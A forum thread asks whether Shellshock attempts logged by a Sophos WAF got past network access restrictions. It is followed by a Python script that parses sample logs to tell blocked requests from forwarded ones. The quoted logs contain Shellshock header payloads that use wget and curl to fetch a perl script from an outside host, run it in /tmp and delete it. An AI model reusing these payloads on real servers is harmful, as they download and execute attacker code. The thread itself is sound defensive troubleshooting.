Did IP with BASH attack get through Site Path Routing restrictions?

We have an internal web site for users in various geographical locations available through a public IP. The site is only available to a small number of internal networks/IPs. The site is set up on the WAF and we restrict traffic using Site Path Routing (settings below) to only our pre-defined networks/IPs. The site is/was in monitor mode in the WAF firewall profile. When I was reviewing the Logging & Reporting>>Webserver Protection log details, I saw that a public IP had attempted a number of BASH Attacks, which was strange because the site is set up to only allow certain pre-defined networks.

When I look at the logs, shown below, the first entry is 'Pattern match', followed by 'blacklist', then 'client denied by server configuration', and lastly the 403 error.

It is strange to me that Pattern match is first.  Why is it inspecting the pattern before the IP checks?  Why should it care about the pattern match if the IP is not allowed to access the site?  If the IP is not allowed, then it seems like it should just toss the request and respond with a 403 error.
Keep in mind that the site was in monitor mode, although the site is on a Windows server.  

My question is: The Webserver Protection log details page shows the BASH Attack, although the site is restricted to only certain networks/IPs. Did the BASH Attack attempt go through? I know it's a Windows server, but I would just like some clarity on how this works. I would like to think that the attacks did not go through just because the IP was restricted, although it was on the blacklist anyway, but then why is it showing as being pattern matched? The logs say that the client was denied, but was their BASH Attack discarded? Can someone clarify this?

Web site WAF settings:
WebServer Protection>>Web Application Firewall>>Site Path Routing
Access Control checked
Allowed network list all allowed networks that I have defined.
Denied network – empty

Logging & Reporting>>Webserver Protection log details:
969990  CVE-2014-6271 - Bash Attack

Web Server protection WAF logs:
sophos1 reverseproxy: [DateTime] [security2:error] [pid/tid] [client 206.xx.xx.x] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:User-Agent. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] [msg "CVE-2014-6271 - Bash Attack"] [data "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5cr\x5cn\x5cr\x5cnXSUCCESS!\x22;system(\x22wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\x22);'"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [hostname "x.x.x.x"] [uri "/"] [unique_id "VjoEFgo-FAQAAEUO0n4AAAAX"]

sophos1 reverseproxy: [DateTime] [authz_blacklist:warn] [pid/tid] [client 206.xx.xx.x:45019] Client is listed on DNSRBL black.rbl.ctipd.astaro.local

sophos1 reverseproxy: [DateTime] [authz_core:error] [pid/tid] [client 206.xx.xx.x:45019] AH01630: client denied by server configuration: proxy:balancer://6htuyi75re3/

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="209" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="6520" url="/" server="x.x.x.x" referer="-" cookie="-" set-cookie="-"

---- More similar to this as well not listed ----

Other errors:
sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:46849] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="218" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="417" url="/index.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"

sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:34101] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="226" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="522" url="/cgi-bin/query.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"

sophos1 reverseproxy: [DateTime] [url_hardening:error] [pid/tid] [client 206.xx.xx.x:34141] Hostname in HTTP request (x.x.x.x) does not match the server name (REF_RevFroVwsMail_redirect_ssl)

sophos1 reverseproxy: id="0299" srcip="206.xx.xx.x" localip="10.0.0.10" size="228" user="-" host="206.xx.xx.x" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="508" url="/cgi-bin/counter.cgi" server="REF_RevFroVwsMail_redirect_ssl" referer="-" cookie="-" set-cookie="-"

---- More similar to this as well not listed ----


This thread was automatically locked due to age.
Hi,

the protection features are checked in parallel; therefore you get all three messages, for ModSecurity, DNSRBL and Access Control. The request would be blocked if just one of them were active. As all of them are active, the actual blocking is done by Access Control.

Sabine
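
As an added example (not part of the original thread, and not Sophos code), here is a Python script that correlates the reverseproxy entries per client and answers the question "did it go through?" from the log alone, the way the question and the reply above reason about it. The sample lines are constructed to mirror the entries quoted in the post: addresses are from documentation ranges, the download URL is a placeholder and the unique_id values are invented. The third client, 192.0.2.44, is hypothetical and shows the case that monitor mode does not protect against: the same Shellshock probe sent from an allowed network gets a ModSecurity warning but is still forwarded and answered with a 200.

```python
import re
from collections import defaultdict

# Constructed sample lines modelled on the Sophos UTM reverseproxy entries quoted in the
# post above. Addresses are from documentation ranges, the download URL is a placeholder
# and the unique_id values are invented. Three hypothetical clients:
#   198.51.100.7  Shellshock probe, outside the allowed networks (the poster's case)
#   192.0.2.20    ordinary request from an allowed network
#   192.0.2.44    Shellshock probe from an allowed network while the profile is in monitor mode
SAMPLE_LOG = r'''
reverseproxy: [Sun Nov 01 10:00:00 2015] [security2:error] [pid 1/tid 2] [client 198.51.100.7] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:User-Agent. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] [msg "CVE-2014-6271 - Bash Attack"] [data "() { :;};/usr/bin/perl -e 'system(\x22wget http://203.0.113.5/x.pl -O /tmp/x.pl\x22);'"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [hostname "203.0.113.9"] [uri "/"] [unique_id "AAAA0001"]
reverseproxy: [Sun Nov 01 10:00:00 2015] [authz_blacklist:warn] [pid 1/tid 2] [client 198.51.100.7:45019] Client is listed on DNSRBL black.rbl.ctipd.astaro.local
reverseproxy: [Sun Nov 01 10:00:00 2015] [authz_core:error] [pid 1/tid 2] [client 198.51.100.7:45019] AH01630: client denied by server configuration: proxy:balancer://6htuyi75re3/
reverseproxy: id="0299" srcip="198.51.100.7" localip="10.0.0.10" size="209" user="-" host="198.51.100.7" method="GET" statuscode="403" reason="-" extra="-" exceptions="-" time="6520" url="/" server="203.0.113.9" referer="-" cookie="-" set-cookie="-"
reverseproxy: id="0299" srcip="192.0.2.20" localip="10.0.0.10" size="5120" user="-" host="192.0.2.20" method="GET" statuscode="200" reason="-" extra="-" exceptions="-" time="31" url="/owa/" server="203.0.113.9" referer="-" cookie="-" set-cookie="-"
reverseproxy: [Sun Nov 01 10:05:00 2015] [security2:error] [pid 1/tid 3] [client 192.0.2.44] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:User-Agent. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] [msg "CVE-2014-6271 - Bash Attack"] [data "() { :;}; /bin/bash -c 'id'"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [hostname "203.0.113.9"] [uri "/cgi-bin/query.cgi"] [unique_id "AAAA0002"]
reverseproxy: id="0299" srcip="192.0.2.44" localip="10.0.0.10" size="1444" user="-" host="192.0.2.44" method="GET" statuscode="200" reason="-" extra="-" exceptions="-" time="88" url="/cgi-bin/query.cgi" server="203.0.113.9" referer="-" cookie="-" set-cookie="-"
'''

# One pattern per Apache module that appears in the quoted log.
MODSEC_RE = re.compile(
    r'\[security2:error\] .*?\[client (?P<ip>[\d.]+)\] ModSecurity: '
    r'(?P<action>Warning|Access denied[^.]*)\. .*?\[id "(?P<rule>\d+)"\] '
    r'\[msg "(?P<msg>[^"]*)"\](?: \[data "(?P<data>[^"]*)"\])?')
RBL_RE = re.compile(r'\[authz_blacklist:warn\] .*?\[client (?P<ip>[\d.]+):\d+\] '
                    r'Client is listed on DNSRBL (?P<rbl>\S+)')
AUTHZ_RE = re.compile(r'\[authz_core:error\] .*?\[client (?P<ip>[\d.]+):\d+\] '
                      r'AH01630: client denied by server configuration')
ACCESS_RE = re.compile(r'id="0299" srcip="(?P<ip>[\d.]+)" .*?method="(?P<method>[A-Z]+)" '
                       r'statuscode="(?P<status>\d+)" .*?url="(?P<url>[^"]*)"')
# The CRS rule 969990 expression, re-applied to the User-Agent value ModSecurity captured.
SHELLSHOCK_RE = re.compile(r'^\(\s*\)\s+\{')


def parse_events(lines):
    """Group the reverseproxy events by client IP, preserving log order."""
    events = defaultdict(list)
    for line in lines:
        if m := MODSEC_RE.search(line):
            events[m['ip']].append(('modsecurity', m['action'], m['rule'], m['msg'], m['data'] or ''))
        elif m := RBL_RE.search(line):
            events[m['ip']].append(('dnsrbl', m['rbl']))
        elif m := AUTHZ_RE.search(line):
            events[m['ip']].append(('access_control',))
        elif m := ACCESS_RE.search(line):
            events[m['ip']].append(('response', m['method'], m['url'], int(m['status'])))
    return events


def analyse(lines):
    """Per client: what blocked the request (if anything), what only logged a match,
    and whether the request was served. The access-log status is the authoritative
    outcome; a ModSecurity 'Warning' means the rule matched in monitor mode and by
    itself neither blocks nor proves the request was forwarded."""
    report = {}
    for ip, evs in parse_events(lines).items():
        blocked_by, logged_only, shellshock, dnsrbl, statuses = [], [], False, False, []
        for ev in evs:
            kind = ev[0]
            if kind == 'modsecurity':
                _, action, rule, msg, data = ev
                target = blocked_by if action.startswith('Access denied') else logged_only
                target.append(f'ModSecurity {rule} ({msg})')
                shellshock = shellshock or bool(SHELLSHOCK_RE.match(data))
            elif kind == 'dnsrbl':
                dnsrbl = True
            elif kind == 'access_control':
                blocked_by.append('Site Path Routing access control (AH01630)')
            elif kind == 'response':
                statuses.append(ev[3])
        status = statuses[-1] if statuses else None
        report[ip] = {
            'status': status,
            'blocked_by': blocked_by,
            'logged_only': logged_only,
            'dnsrbl_listed': dnsrbl,
            'shellshock_payload': shellshock,
            # Served only if nothing on the proxy denied it and the proxy answered below 400.
            'reached_backend': not blocked_by and status is not None and status < 400,
        }
    return report


if __name__ == '__main__':
    for ip, r in analyse(SAMPLE_LOG.splitlines()).items():
        fate = 'FORWARDED to backend' if r['reached_backend'] else f"blocked at the WAF ({r['status']})"
        print(f"{ip:14} {fate}; shellshock payload: {r['shellshock_payload']}; "
              f"blocked by: {r['blocked_by'] or 'nothing'}; logged only: {r['logged_only']}")
```

Run it as-is and the first client comes out as blocked at the WAF with a 403 by access control while rule 969990 is listed under "logged only", which is the situation in the post. The order of the messages is not evidence of which check decided the outcome: in Apache 2.4 ModSecurity inspects the request headers from an early request hook, before the authorization hooks that produce the AH01630 denial, so the pattern match is written first even though access control is what refused the request. The caveat the third client illustrates is that monitor mode logs and does nothing else; for a source inside the allowed networks the same payload would have been forwarded, so a warning in the Webserver Protection log is only reassuring when it is paired with a denial and a 4xx in the access line.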